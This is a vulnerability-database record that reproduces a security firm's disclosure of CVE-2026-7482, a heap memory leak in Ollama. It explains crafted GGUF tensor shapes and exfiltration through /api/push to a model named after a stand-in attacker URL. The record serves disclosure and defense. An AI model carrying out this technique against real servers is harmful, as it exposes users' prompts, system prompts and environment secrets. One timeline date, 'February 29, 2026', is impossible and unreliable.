{"uuid": "f6d41719-7e76-40c7-ac12-d7d70f2ac1db", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "title": "Bleeding Llama: Critical Unauthenticated Memory Leak in Ollama - cyera.com article", "description": "# Bleeding Llama: Critical Unauthenticated Memory Leak in Ollama | Cyera Research\nTL;DR\n-----\n\nRef: [https://www.cyera.com/research/bleeding-llama-critical-unauthenticated-memory-leak-in-ollama](https://www.cyera.com/research/bleeding-llama-critical-unauthenticated-memory-leak-in-ollama)\n\n\nWe discovered a critical vulnerability (CVE-2026\u20137482, CVSS 9.1) in Ollama that enables unauthenticated attackers to leak the entire Ollama process memory, potentially impacting **300,000** servers globally.  \nThe leaked memory contains user messages (prompts), system prompts, and environment variables.\n\nWhat Is Ollama, Exactly?\n------------------------\n\nOllama is an open-source platform that lets you run LLMs directly on your own machine instead of relying on cloud services like _OpenAI_, _Anthropic_, or _xAI_.  \nWith Ollama, you can download, manage, and interact with models like _Llama_, _Mistral_, and others \u2014 all running locally on your hardware.\n\nWith roughly 170,000 stars on GitHub, over 100 million downloads on Docker Hub, and wide adoption across enterprises, Ollama has become the standard for running open-source models locally.\n\nCreating model instances in Ollama\n----------------------------------\n\nCreating model instances in Ollama can be done in two main ways\n\nThe first is using `/api/pull` API endpoint \u2014 this downloads an existing model from the Ollama registry and makes it available locally.  \nYou get a ready-made model (like `llama3` or `mistral`) that you can use right away for inference.  \nIt\u2019s the simplest approach when you don\u2019t need customization.\n\nThe second way is using `/api/create` API endpoint \u2014 this lets you build custom model instances by specifying configuration parameters like system prompts, quantization levels, and more.  \nThe base model can come from two sources \u2014 either pulled from a remote registry (via the `from` parameter), or built from previously uploaded model files.\n\nIn this research, we\u2019ll focus on the second option \u2014 how users create models from previously uploaded files.\n\n![](https://cdn.prod.website-files.com/694a42d655201e09edb32d65/69f6f991669e297f65128144_7b3dd88a.png)\n\nBut first \u2014 how do users upload files in the first place?\n\nFiles get uploaded to the Ollama server through the `/api/blobs/sha256:[sha256-digest]` API endpoint.  \nThe `[sha256-digest]` part is exactly what you\u2019d expect \u2014 a SHA-256 hash calculated from the file\u2019s content.  \nThe actual file content gets sent in the HTTP body of the request.\n\n![](https://cdn.prod.website-files.com/694a42d655201e09edb32d65/69f9cad3d5e8f2d1fc7b35f1_1*dpka27K8NgwpPA42j_UBEw.png)\n\nAfter that, to create a model instance in Ollama, the user calls `/api/create` with the uploaded files as parameters in the JSON request body.\n\n![](https://cdn.prod.website-files.com/694a42d655201e09edb32d65/69f6f991669e297f6512815f_e894cd0d.png)\n\nthe breakdown of the API request to `/api/create` will be explained later in this article.\n\n### **Disclaimer**\n\n**\u200d**_The next section is a bit technical. We\u2019ve kept it as simple as possible and only included what\u2019s necessary to understand the vulnerability. So please bear with us - we promise the vulnerability part is worth it._\n\nGGUF (GPT-Generated Unified Format)\n-----------------------------------\n\nGGUF is a file format used to store large language models in a way that makes them efficient to load and run locally.\n\nA GGUF file contains tensors \u2014 which are basically multi-dimensional arrays of numbers that represent the model\u2019s learned parameters (weights). Think of tensors as the \u201cbrain\u201d of the model \u2014 they store all the knowledge the model has learned during training.\n\nThe header of a GGUF file contains data that describes it, like the version of the GGUF format, the amount of tensors it contains and some key-value metadata.\n\n![](https://cdn.prod.website-files.com/694a42d655201e09edb32d65/69f6f991669e297f65128147_0f992bfc.png)\n\nOne metadata field worth mentioning is `general.file_type`\u2014 this tells you (shocking) the file type of the GGUF, which determines how the numbers inside the tensors are stored.  \nFor this research, we only care about F16 (float-16) and F32 (float-32).\n\nAfter the GGUF header comes a list of tensor objects. Each one stores the tensor\u2019s name, number of dimensions, data type (precision info), and an offset that points to where the actual tensor data lives later in the file.\n\n\u200d\n\n![](https://cdn.prod.website-files.com/694a42d655201e09edb32d65/69f6f991669e297f6512815c_88102861.png)\n\nQuantization\n------------\n\nQuantization is the process of reducing the precision of numbers stored in tensors, making the model smaller and faster to run \u2014 at the cost of some accuracy.\n\nIn GGUF, F32 file type stores each number using 4 bytes, while F16 uses only 2 bytes.  \nMoving from F32 to F16 cuts memory usage in half (making the model run faster), but comes with permanent data loss \u2014 some decimal precision is gone and can\u2019t be recovered. Going the other way, from F16 to F32, involves no data loss at all.\n\nThe Vulnerability\n-----------------\n\n### Before We Start\n\nFor those of you familiar with Go, you\u2019re probably wondering \u2014 how is an out-of-bounds memory vulnerability even possible in a memory-safe language? Normally, Go would just panic and crash.\n\nThe answer is the `unsafe` package. Go gives developers an escape hatch for low-level memory operations, and as the name suggests, all the usual safety guarantees go out the window. Unsurprisingly, the one place Ollama uses `unsafe` is exactly where this vulnerability lives.\n\n![](https://cdn.prod.website-files.com/694a42d655201e09edb32d65/69f6f991669e297f65128153_2b61be86.jpeg)\n\n### Creating Models. Again.\n\nLike we mentioned at the start of this article, there are a few ways to create a model instance in Ollama. The one we\u2019re focusing on is through the `/api/create` endpoint.\n\nThe function that handles incoming requests to this endpoint is `server.CreateHandler`.\n\nThe first thing it does is parse the incoming request based on a known structure. This structure contains many properties, but the ones we care about for this vulnerability are the model name (`model`), the uploaded files that will construct the model (`files`), and the `quantize` parameter, which we'll explain later.\n\n![](https://cdn.prod.website-files.com/694a42d655201e09edb32d65/69f6f991669e297f6512814d_2badc813.png)\n\nAfter parsing, the function does some basic sanity checks \u2014 it verifies that the model name is valid and the file paths are legitimate (no path-traversal attempts, and the files actually exist on disk).\n\nNext, if the model creation is using files (and not, say, a URL), the function calls `convertModelFromFiles   \u200d`\n\n![](https://cdn.prod.website-files.com/694a42d655201e09edb32d65/69f6f991669e297f65128156_338cea75.png)\n\n### Create a Model from a GGUF File\n\nWhen one call `/api/create` to create model from uploaded file, Ollama first needs to figure out what kind of file you gave it \u2014 it does this by checking the file extension (`.gguf, .safetensors`), or if there isn't one, by peeking at the first few bytes.\n\nFor GGUF file formats, Ollama parses the raw GGUF file into an internal struct called a **Layer**, which holds both the file metadata and the model\u2019s tensors.  \nFrom this point on, Ollama works with the Layer rather than the raw file.\n\n![](https://cdn.prod.website-files.com/694a42d655201e09edb32d65/69f6f991669e297f65128159_c6424aa5.png)\n\nNext, `createModel` is called to orchestrate the model creation.  \nBefore actually saving the model, Ollama checks whether quantization is needed.\n\n_Quick reminder: quantization converts tensors\u2019s data from one format to another (F32, F16, etc.)._\n\nQuantization only runs if three conditions are met: the user explicitly requested a target format (via the quantize parameter), the file is a GGUF, and the current format is different from the requested one.  \nIf the model is already in the right format, nothing happens.\n\nIf quantization is needed, the process looks like this:\n\nFirst, a new Layer is prepared by copying each tensor\u2019s metadata \u2014 things like shape and type \u2014 but leaving the actual data out. Think of it as setting up empty slots for the new tensors.\n\n![](https://cdn.prod.website-files.com/694a42d655201e09edb32d65/69f6f991669e297f6512814a_f7404e4f.png)\n\n\u200d\n\nThen, for each tensor, `WriteTo` is called \u2014 the function responsible for the actual mathematical conversion from the source type to the destination type.\n\nFor optimization reasons, it first converts the source data to F32, and then from F32 to the destination format. By always going through F32 as a middle step, you only need two conversion functions per format instead of a direct path between every possible pair.\n\nif the target type is F32, this middle-step just copies the data directly (there is no need to do any type of conversion)\n\n![](https://cdn.prod.website-files.com/694a42d655201e09edb32d65/69f6f991669e297f65128162_9a783273.png)\n\nThen \u2014 `WriteTo` function passes the converted F32 tensor to `ggml.Quantize` which handles the final conversion from F32 to the target format.\n\n![](https://cdn.prod.website-files.com/694a42d655201e09edb32d65/69f6f991669e297f65128165_2bd13fe3.png)\n\nOnce all tensors are converted, a new GGUF file is written with the updated header and the newly quantized tensors \u2014 and the model is ready to use.\n\n### Finally, The Bug\n\nLet\u2019s take a closer look at `WriteTo`.\n\nAs mentioned, WriteTo starts by converting the source data to F32.  \nIf the source is already F32, it simply copies the tensor data from the original buffer, otherwise, it calls `ggml.ConvertToF32`\n\n![](https://cdn.prod.website-files.com/694a42d655201e09edb32d65/69f6f991669e297f65128168_5e9bd2d1.png)\n\nAs you can see \u2014 `ConvertToF32` function takes three parameters: the original data buffer, the source type, and `q.from.Elements().`\n\nThat third parameter is worth pausing on.\n\n![](https://cdn.prod.website-files.com/694a42d655201e09edb32d65/69f6f991669e297f6512816b_f7910c27.png)\n\n`Elements()` returns the total number of elements in a tensor.  \nRemember \u2014 tensors are multi-dimensional \u2014 their shape describes their dimensions.  \n`Elements()` simply multiplies those dimensions together. A tensor with shape (3, 3, 3) for example has 27 elements.\n\nNow, lets return to `ConvertToF32` function.\n\n![](https://cdn.prod.website-files.com/694a42d655201e09edb32d65/69f6f991669e297f6512816e_721f69af.png)\n\nThese functions look scary, but `ConvertToF32` is actually pretty simple \u2014 it just calls the appropriate conversion function based on the source type. For example, if the source is F16, it calls `ggml_fp16_to_fp32_row` with three parameters: a pointer to the original data, an output buffer where the converted data will be written, and the number of elements to read \u2014 which comes from `Elements().`\n\nFrom there, `ggml_fp16_to_fp32_row` loops over the buffer and reads exactly that many elements, converting each one to F32.\n\n**So what\u2019s the problem?  \n**GGUF is just a binary format \u2014 anyone can create one manually and set the tensor\u2019s shape to whatever they want. There\u2019s no validation that the number of elements we\u2019re about to read actually matches the real size of the data.\n\nSo if an attacker puts a very large number in the shape field, the loop will blindly read past the end of the buffer \u2014 that\u2019s our out-of-bounds heap read.\n\n![](https://cdn.prod.website-files.com/694a42d655201e09edb32d65/69f6f991669e297f65128171_9d3843ea.png)\n\nAt this point, the output buffer contains more than just the model data \u2014 it also includes whatever happened to be sitting in heap memory right after the buffer. As we\u2019ll show later, this can contain some pretty sensitive stuff: system prompts and messages from other users sent to other models.\n\n![](https://cdn.prod.website-files.com/694a42d655201e09edb32d65/69f6f991669e297f65128174_b9a36107.png)\n\nSo what does Ollama do with this output buffer? As mentioned earlier, it converts it from F32 to the target format, and then writes the whole thing to disk as the new model file \u2014 sensitive data and all.\n\n\u200d\n\n### Leaking the Data Without Breaking It\n\nThe data read from the heap goes through multiple conversions before being written to disk \u2014 and that\u2019s a problem.  \nMost quantization formats are lossy, meaning the data gets corrupted and becomes unreadable.\n\nTo keep the data intact, we use a simple trick: set the tensor type to F16 and request F32 as the target format. F16 to F32 is a lossless conversion (2 bytes to 4 bytes), so the heap data comes out readable on the other side.  \nAnd since the target is already F32, the second conversion does nothing at all. The data lands on disk exactly as it was in memory.\n\nExfiltrating the data\n---------------------\n\nSo we have a model file with leaked heap data sitting on the server - now what? Without a way to get it back, the out-of-bounds read is pretty useless. So how do we bring it home?\n\nEarlier in this post we talked about the different ways to create models in Ollama - from local files, and also by pulling from a registry using `/api/pull.` Well, it turns out Ollama also lets you go the other direction: pushing a model to a registry using `/api/push.`\n\nThe `/api/push` endpoint accepts a few parameters, one of them being model - the name of the model to upload. The function that handles this request is PushHandler. The first thing it does is check whether a model with that name exists on disk. If it does, it calls PushModel to handle the upload.\n\nHere\u2019s where it gets interesting. PushModel starts by parsing the model name - and if the name looks like an HTTP URI, it will push the entire model to that URI.\n\nNow you might be thinking - \u201cBut we created the model from a file, not a URI. How can the name be a URI?\u201d\n\nThe thing is \u2014 there\u2019s no validation preventing it. You can create a model via `/api/create` (with files) and have the model name to be something like `http://attacker-server.com/namespace/model:tag`, then call /api/push with that same name, and Ollama will happily upload the model \u2014 leaked heap data and all \u2014 straight to your server.\n\n![](https://cdn.prod.website-files.com/694a42d655201e09edb32d65/69f6f991669e297f65128177_eb199852.png)\n\nExploitation\n------------\n\nIn this section we\u2019ll walk through a real exploitation of the bug - what can be extracted, and just how easy the entire attack is.\n\nFirst, let\u2019s set the scene. We have a running Ollama instance with the `llama3.1` model installed. Three different users are interacting with this model from their own machines - sending messages, getting responses.\n\n![](https://cdn.prod.website-files.com/694a42d655201e09edb32d65/69f6f991669e297f6512817a_d28b1d8a.png)\n\nNow, the attacker sends a crafted GGUF file to the Ollama server \u2014 the tensor\u2019s shape is set to 1 million elements, while the actual data is only a fraction of that size.\n\n![](https://cdn.prod.website-files.com/694a42d655201e09edb32d65/69f6f991669e297f6512817d_bffbba21.png)\n\nNext, the attacker creates the model \u2014 triggering the out-of-bounds read. The model name is set to a controlled server domain, which will be used to exfiltrate the leaked data in the next step.\n\n![](https://cdn.prod.website-files.com/694a42d655201e09edb32d65/69f6f991669e297f6512818e_1df066c0.png)\n\nNow, before we use the `/api/push` API to exfiltrate the data, we need to set up a receiving server that knows how to communicate over the protocol Ollama uses.\n\n![](https://cdn.prod.website-files.com/694a42d655201e09edb32d65/69f6f991669e297f6512818b_b3826ab0.png)\n\nFinally, we use `/api/push` to push the model to our controlled server - and just like that, the model file containing the leaked heap data arrives on the other end.\n\n![](https://cdn.prod.website-files.com/694a42d655201e09edb32d65/69f6f991669e297f65128188_d9beeb82.png)\n\n![](https://cdn.prod.website-files.com/694a42d655201e09edb32d65/69f6f991669e297f65128185_2438d390.png)\n\nAnd there it is \u2014 the model file is now on our server. By reversing the quantization, we can read the raw heap data. Let\u2019s take a look at what was hiding in there.\n\n![](https://cdn.prod.website-files.com/694a42d655201e09edb32d65/69f6f991669e297f65128191_4cb75d79.png)\n\nAs you can see, the leaked data contains user prompts, system prompts from other models, and even environment variables from the machine running the Ollama server - all highly sensitive information, now exposed with just three API calls.\n\nImpact\n------\n\nOllama, when launched, listens on all interfaces (0.0.0.0) by default with no authentication. Today, there are roughly **300,000 exposed servers** on the internet. This means threat actors can exploit this vulnerability without any credentials \u2014 using only three API calls, they can extract the entire heap memory of the Ollama process.\n\nAs we showed above, this memory contains user messages (prompts), system prompts, and environment variables from the host machine running Ollama.\n\nNow imagine a large enterprise with 10,000+ employees using Ollama as their AI \u201cchat.\u201d Think about how much sensitive data flows into the Ollama server. An attacker can learn basically anything about the organization from your AI inference \u2014 API keys, proprietary code, customer contracts, and much more.\n\nOn top of that, engineers often connect Ollama to tools like Claude Code. In those cases, the impact is even higher - all tool outputs flow to the Ollama server, get saved in the heap, and potentially end up in an attacker\u2019s hands.\n\nThe risk is immense, and every organization needs to mitigate this immediately.\n\nDisclosure Timeline\n-------------------\n\n*   **February 2, 2026:** Vulnerability reported to Ollama.\n*   **February 13, 2026:** Researcher followed up requesting acknowledgement.\n*   **February 25, 2026:** Ollama acknowledged the vulnerability and shared a PR with a proposed fix.\n*   **February 25, 2026:** Researcher confirmed the fix was valid and asked about CVE submission.\n*   **February 25, 2026:** Ollama asked the researcher to submit the CVE independently.\n*   **February 26, 2026:** Researcher followed up proposing GitHub Security Advisories as a faster alternative to MITRE, warning that releasing a fix without explicitly flagging it as a security patch leaves users unaware of the urgency \u2014 exposing them to active exploitation risk if they don\u2019t prioritize the update.\n*   **February 29, 2026:** Researcher followed up requesting a status update.\n*   **March 2, 2026:** Researcher submitted a CVE request through MITRE.\n*   **March 26, 2026:** Researcher followed up with MITRE requesting a status update on the CVE submission.\n*   **April 26, 2026**: With no resolution from MITRE, researcher approached [Echo](https://www.echo.ai/blog/cve-2026-7482-ollama-vulnerability), a third-party CVE Numbering Authority, to request CVE assignment\n*   \u200d**April 28, 2026**: Echo acknowledged the report , assigned CVE-2026-7482 to the vulnerability and reported Ollama for visibility\n*   **May 1, 2026:** CVE\u00a0was published\n*   **May 2, 2026:** Cyera published this blog post\n\nAcknowledgment\n--------------\n\nCyera Research would like to extend our sincere thanks to [Echo](https://www.echo.ai/blog/cve-2026-7482-ollama-vulnerability) for their support and partnership throughout this research. Their contribution was instrumental in bringing this work to light, and we're grateful for their commitment to advancing security for the broader community.", "description_format": "markdown", "vulnerability": "CVE-2026-7482", "creation_timestamp": "2026-05-06T06:28:08.638804+00:00", "timestamp": "2026-05-06T06:28:08.638804+00:00", "related_vulnerabilities": ["CVE-2026-7482"], "meta": [{"tags": ["vulnerability:exploitability=documented"]}], "author": {"login": "adulau", "name": "Alexandre Dulaunoy", "uuid": "c933734a-9be8-4142-889e-26e95c752803"}}